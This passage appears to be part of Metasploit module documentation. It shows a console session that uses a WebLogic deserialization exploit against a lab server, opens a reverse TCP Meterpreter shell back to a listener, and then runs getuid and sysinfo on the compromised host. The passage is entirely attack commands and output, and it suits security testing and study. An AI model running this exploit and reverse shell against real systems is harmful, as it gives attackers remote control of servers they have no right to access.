  payload => linux/x64/meterpreter/reverse_tcp
  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.196
  rhosts => 172.16.215.196
  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run

  [*] Started reverse TCP handler on 172.16.215.1:4444
  [*] 172.16.215.196:7001 - WebLogic version detected: 12.1.3.0.0
  [*] 172.16.215.196:7001 - Sending handshake...
  [*] 172.16.215.196:7001 - Formatting payload...
  [*] 172.16.215.196:7001 - Sending object...
  [*] Sending stage (3012516 bytes) to 172.16.215.196
  [*] Meterpreter session 6 opened (172.16.215.1:4444 -> 172.16.215.196:60672) at 2020-05-15 09:41:17 -0500
  [*] 172.16.215.196:7001 - Command Stager progress - 101.36% done (820/809 bytes)

  meterpreter > getuid
  Server username: no-user @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
  meterpreter > sysinfo
  Computer     : 172.16.215.196
  OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  ```